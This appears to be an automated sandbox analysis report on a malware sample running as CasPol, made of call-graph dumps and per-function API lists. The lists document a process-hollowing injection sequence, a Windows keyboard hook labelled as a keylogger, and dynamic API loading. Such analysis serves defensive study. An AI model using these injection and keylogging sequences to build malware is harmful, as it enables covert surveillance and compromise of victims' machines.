55687 4131d3 55685->55687 55688 413086 55686->55688 55689 401fd8 11 API calls 55687->55689 55690 401fd8 11 API calls 55688->55690 55691 4130d7 55689->55691 55692 41308f 55690->55692 55694 401fd8 11 API calls 55691->55694 55693 401fd8 11 API calls 55692->55693 55695 41309b 55693->55695 55696 4131e5 55694->55696 55697 401fd8 11 API calls 55695->55697 55698 401f09 11 API calls 55696->55698 55699 4130a7 55697->55699 55700 4131f1 55698->55700 55701 401fd8 11 API calls 55699->55701 55702 401fd8 11 API calls 55700->55702 55703 4130b3 55701->55703 55704 4131fd 55702->55704 55705 401fd8 11 API calls 55703->55705 55706 401fd8 11 API calls 55704->55706 55707 4130bf 55705->55707 55708 413209 55706->55708 55709 401fd8 11 API calls 55707->55709 55710 401fd8 11 API calls 55708->55710 55711 4130cb 55709->55711 55712 413215 55710->55712 55713 401fd8 11 API calls 55711->55713 55714 401fd8 11 API calls 55712->55714 55713->55691 55715 413221 55714->55715 55716 401fd8 11 API calls 55715->55716 55717 41322d 55716->55717 55718 401fd8 11 API calls 55717->55718 55719 413239 55718->55719 55720 401fd8 11 API calls 55719->55720 55721 413245 55720->55721 55722 401fd8 11 API calls 55721->55722 55723 413251 55722->55723 55724 401fd8 11 API calls 55723->55724 55725 412abe 55724->55725 55725->55578 55727 4132a6 55726->55727 55729 413277 55726->55729 55728 4132b5 55727->55728 55741 10001c5b 55727->55741 55730 40417e 28 API calls 55728->55730 55745 411d2d 55729->55745 55732 4132c1 55730->55732 55734 401fd8 11 API calls 55732->55734 55736 412f63 55734->55736 55736->55621 55738->55664 55739->55672 55740->55659 55742 10001c6b ___scrt_fastfail 55741->55742 55749 100012ee 55742->55749 55744 10001c87 55744->55728 55791 411d39 55745->55791 55748 411fa2 22 API calls ___std_exception_copy 55748->55727 55750 10001324 ___scrt_fastfail 55749->55750 55751 100013b7 GetEnvironmentVariableW 55750->55751 55775 100010f1 55751->55775 55754 100010f1 57 API calls 55755 10001465 55754->55755 55756 100010f1 57 API calls 55755->55756 55757 10001479 55756->55757 55758 100010f1 57 API calls 55757->55758 55759 1000148d 55758->55759 55760 100010f1 57 API calls 55759->55760 55761 100014a1 55760->55761 55762 100010f1 57 API calls 55761->55762 55763 100014b5 lstrlenW 55762->55763 55764 100014d9 lstrlenW 55763->55764 55774 100014d2 55763->55774 55765 100010f1 57 API calls 55764->55765 55766 10001501 lstrlenW lstrcatW 55765->55766 55767 100010f1 57 API calls 55766->55767 55768 10001539 lstrlenW lstrcatW 55767->55768 55769 100010f1 57 API calls 55768->55769 55770 1000156b lstrlenW lstrcatW 55769->55770 55771 100010f1 57 API calls 55770->55771 55772 1000159d lstrlenW lstrcatW 55771->55772 55773 100010f1 57 API calls 55772->55773 55773->55774 55774->55744 55776 10001118 ___scrt_fastfail 55775->55776 55777 10001129 lstrlenW 55776->55777 55788 10002c40 55777->55788 55780 10001177 lstrlenW FindFirstFileW 55782 100011a0 55780->55782 55783 100011e1 55780->55783 55781 10001168 lstrlenW 55781->55780 55784 100011c7 FindNextFileW 55782->55784 55785 100011aa 55782->55785 55783->55754 55784->55782 55787 100011da FindClose 55784->55787 55785->55784 55790 10001000 57 API calls ___scrt_fastfail 55785->55790 55787->55783 55789 10001148 lstrcatW lstrlenW 55788->55789 55789->55780 55789->55781 55790->55785 55826 4117d7 55791->55826 55793 411d57 55794 411d6d SetLastError 55793->55794 55795 4117d7 SetLastError 55793->55795 55822 411d35 55793->55822 55794->55822 55796 411d8a 55795->55796 55796->55794 55799 411dac GetNativeSystemInfo 55796->55799 55796->55822 55798 411df2 55811 411dff SetLastError 55798->55811 55829 411cde VirtualAlloc 55798->55829 55799->55798 55802 411e22 55803 411e47 GetProcessHeap HeapAlloc 55802->55803 55855 411cde VirtualAlloc 55802->55855 55805 411e70 55803->55805 55806 411e5e 55803->55806 55807 4117d7 SetLastError 55805->55807 55856 411cf5 VirtualFree 55806->55856 55810 411eb9 55807->55810 55808 411e3a 55808->55803 55808->55811 55812 411f6b 55810->55812 55830 411cde VirtualAlloc 55810->55830 55811->55822 55857 4120b2 GetProcessHeap HeapFree 55812->55857 55815 411ed2 ctype 55831 4117ea 55815->55831 55817 411efe 55817->55812 55835 411b9a 55817->55835 55821 411f36 55821->55812 55821->55822 55851 1000220c 55821->55851 55822->55748 55823 411f5c 55823->55822 55824 411f60 SetLastError 55823->55824 55824->55812 55827 4117e6 55826->55827 55828 4117db SetLastError 55826->55828 55827->55793 55828->55793 55829->55802 55830->55815 55832 4118c0 55831->55832 55834 411816 ctype ___scrt_fastfail 55831->55834 55832->55817 55833 4117d7 SetLastError 55833->55834 55834->55832 55834->55833 55836 411bbb IsBadReadPtr 55835->55836 55843 411ca5 55835->55843 55837 411bd5 55836->55837 55836->55843 55838 411cbd SetLastError 55837->55838 55841 411ca7 SetLastError 55837->55841 55842 411c8a IsBadReadPtr 55837->55842 55837->55843 55858 440f5d 55837->55858 55838->55843 55841->55843 55842->55837 55842->55843 55843->55812 55845 41198a 55843->55845 55849 4119b0 55845->55849 55846 411a99 55847 4118ed VirtualProtect 55846->55847 55848 411aab 55847->55848 55848->55821 55849->55846 55849->55848 55873 4118ed 55849->55873 55852 10002215 55851->55852 55853 1000221a dllmain_dispatch 55851->55853 55877 100022b1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 55852->55877 55853->55823 55855->55808 55856->55811 55857->55822 55859 446206 55858->55859 55860 446213 55859->55860 55861 44621e 55859->55861 55862 4461b8 ___crtLCMapStringA 21 API calls 55860->55862 55863 446226 55861->55863 55869 44622f __Getctype 55861->55869 55867 44621b 55862->55867 55864 446802 _free 20 API calls 55863->55864 55864->55867 55865 446234 55871 44062d 20 API calls __dosmaperr 55865->55871 55866 446259 RtlReAllocateHeap 55866->55867 55866->55869 55867->55837 55869->55865 55869->55866 55872 443001 7 API calls 2 library calls 55869->55872 55871->55867 55872->55869 55874 4118fe 55873->55874 55876 4118f6 55873->55876 55875 411971 VirtualProtect 55874->55875 55874->55876 55875->55876 55876->55849 55877->55853 55878 42f97e 55879 42f989 55878->55879 55880 42f99d 55879->55880 55882 432f7f 55879->55882 55883 432f8e 55882->55883 55885 432f8a 55882->55885 55884 440f5d 22 API calls 55883->55884 55884->55885 55885->55880 55886 40165e 55887 401666 55886->55887 55888 401669 55886->55888 55889 4016a8 55888->55889 55891 401696 55888->55891 55890 43455e new 22 API calls 55889->55890 55892 40169c 55890->55892 55893 43455e new 22 API calls 55891->55893 55893->55892 55894 426cdc 55899 426d59 send 55894->55899 55900 10001f3f 55901 10001f4b ___DestructExceptionObject 55900->55901 55918 1000247c 55901->55918 55903 10001f52 55904 10002041 55903->55904 55905 10001f7c 55903->55905 55912 10001f57 ___scrt_is_nonwritable_in_current_image 55903->55912 55934 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 55904->55934 55929 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 55905->55929 55908 10002048 55909 10001f8b __RTC_Initialize 55909->55912 55930 100022fc RtlInitializeSListHead 55909->55930 55911 10001f99 ___scrt_initialize_default_local_stdio_options 55931 100046c5 5 API calls _ValidateLocalCookies 55911->55931 55914 10001fad 55914->55912 55932 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 55914->55932 55916 10001fb8 55916->55912 55933 10004669 5 API calls _ValidateLocalCookies 55916->55933 55919 10002485 55918->55919 55935 10002933 IsProcessorFeaturePresent 55919->55935 55921 10002491 55936 100034ea 55921->55936 55923 10002496 55928 1000249a 55923->55928 55945 100053c8 55923->55945 55926 100024b1 55926->55903 55928->55903 55929->55909 55930->55911 55931->55914 55932->55916 55933->55912 55934->55908 55935->55921 55937 100034ef ___vcrt_initialize_winapi_thunks 55936->55937 55949 10003936 7 API calls 2 library calls 55937->55949 55939 100034f9 55940 100034fd 55939->55940 55950 100038e8 55939->55950 55940->55923 55942 10003505 55943 10003510 55942->55943 55958 10003972 RtlDeleteCriticalSection 55942->55958 55943->55923 55980 10007457 55945->55980 55948 10003529 8 API calls 3 library calls 55948->55928 55949->55939 55959 10003af1 55950->55959 55954 1000390b 55955 10003918 55954->55955 55965 1000391b 6 API calls ___vcrt_FlsFree 55954->55965 55955->55942 55957 100038fd 55957->55942 55958->55940 55966 10003a82 55959->55966 55961 10003b0b 55962 10003b24 TlsAlloc 55961->55962 55963 100038f2 55961->55963 55963->55957 55964 10003ba2 6 API calls try_get_function 55963->55964 55964->55954 55965->55957 55967 10003aaa 55966->55967 55970 10003aa6 __crt_fast_encode_pointer 55966->55970 55967->55970 55973 100039be 55967->55973 55970->55961 55971 10003ac4 GetProcAddress 55971->55970 55972 10003ad4 __crt_fast_encode_pointer 55971->55972 55972->55970 55975 100039cd try_get_first_available_module 55973->55975 55974 100039ea LoadLibraryExW 55974->55975 55976 10003a05 GetLastError 55974->55976 55975->55974 55977 10003a60 FreeLibrary 55975->55977 55978 10003a77 55975->55978 55979 10003a38 LoadLibraryExW 55975->55979 55976->55975 55977->55975 55978->55970 55978->55971 55979->55975 55983 10007470 55980->55983 55981 10002ada _ValidateLocalCookies 5 API calls 55982 100024a3 55981->55982 55982->55926 55982->55948 55983->55981 55984 10005bff 55992 10005d5c 55984->55992 55988 10005c1b 55989 10005c28 55988->55989 56000 10005c2b 11 API calls 55988->56000 55991 10005c13 55993 10005c45 _abort 5 API calls 55992->55993 55994 10005d83 55993->55994 55995 10005d9b TlsAlloc 55994->55995 55998 10005d8c 55994->55998 55995->55998 55996 10002ada _ValidateLocalCookies 5 API calls 55997 10005c09 55996->55997 55997->55991 55999 10005b7a 20 API calls 2 library calls 55997->55999 55998->55996 55999->55988 56000->55991

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                                                                                                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                                                                                                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD17
                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CD28
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD2B
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040EA1C), ref: 0041CD38
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD3B
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040EA1C), ref: 0041CD48
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD4B
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD5D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD60
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CD6D
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD70
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040EA1C), ref: 0041CD81
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD84
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040EA1C), ref: 0041CD95
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD98
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDAA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDAD
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDBA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDBD
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDCA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDCD
                                                                                                                                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CDDA
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CDDD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                                                                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                          • API String ID: 4236061018-3687161714
                                                                                                                                                                          • Opcode ID: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                                                                                          • Instruction ID: 9b463eec3a0437fb1f175c53e93b0f4db36c95b88d1cb607187732a7b05a7934
                                                                                                                                                                          • Opcode Fuzzy Hash: 5fded5d77b72a202610b087cc82529c2f7d7b10a8ab2824fd38dfad8e3bd9f71
                                                                                                                                                                          • Instruction Fuzzy Hash: E2418BA0E8035879DB207BB65D89E3B3E5CD9857953614837B44C93550EBBCEC408EAE

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                                                                                                          • ReadProcessMemory.KERNEL32 ref: 004182A6
                                                                                                                                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                                                                                                          • NtClose.NTDLL(?), ref: 00418332
                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                                                                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                                                                                                          • WriteProcessMemory.KERNEL32 ref: 00418446
                                                                                                                                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                                                                                                          • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                                                                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                                                                                                          • NtClose.NTDLL(?), ref: 004184A3
                                                                                                                                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004184B5
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                                                                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                                                                                                          • API String ID: 316982871-3035715614
                                                                                                                                                                          • Opcode ID: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                                                                                                                                                          • Instruction ID: 6e605283caf6159cf0966bfa06415cd8be065dbd330dc5e1b11c181c8b11ae87
                                                                                                                                                                          • Opcode Fuzzy Hash: 8f07b7a254e48d041da81a251375b09bf463a0f5c88c0795319c3241d295ec1a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5AA14DB0604301AFDB209F64DD85B6B7BE8FB88745F04482EF689D6291EB78DC44CB59

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 1693 40a2f3-40a30a 1694 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1693->1694 1695 40a36e-40a37e GetMessageA 1693->1695 1694->1695 1698 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1694->1698 1696 40a380-40a398 TranslateMessage DispatchMessageA 1695->1696 1697 40a39a 1695->1697 1696->1695 1696->1697 1699 40a39c-40a3a1 1697->1699 1698->1699
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                                                                                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040A328
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • GetMessageA.USER32 ref: 0040A376
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0040A385
                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                                                                                                          Strings
                                                                                                                                                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                          • String ID: Keylogger initialization failure: error
                                                                                                                                                                          • API String ID: 3219506041-952744263
                                                                                                                                                                          • Opcode ID: 7cde40bb29b11998e41da7f6fd46d44b8e76a4fe11235a41ece9cee6dc4e42f4
                                                                                                                                                                          • Instruction ID: bc7b44719e59224dfa2ccda8cade24f8ec1ba8a069f7aee67aec650331f950b6
                                                                                                                                                                          • Opcode Fuzzy Hash: 7cde40bb29b11998e41da7f6fd46d44b8e76a4fe11235a41ece9cee6dc4e42f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 8911C131510301EBC710BB769C0986B77ACEB95715B20097EFC82E22D1FB34C910CBAA
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                          • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                          • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                          • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                          • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                                                                                            • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                                                                                            • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0040F905
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseExitOpenProcessQuerySleepValue
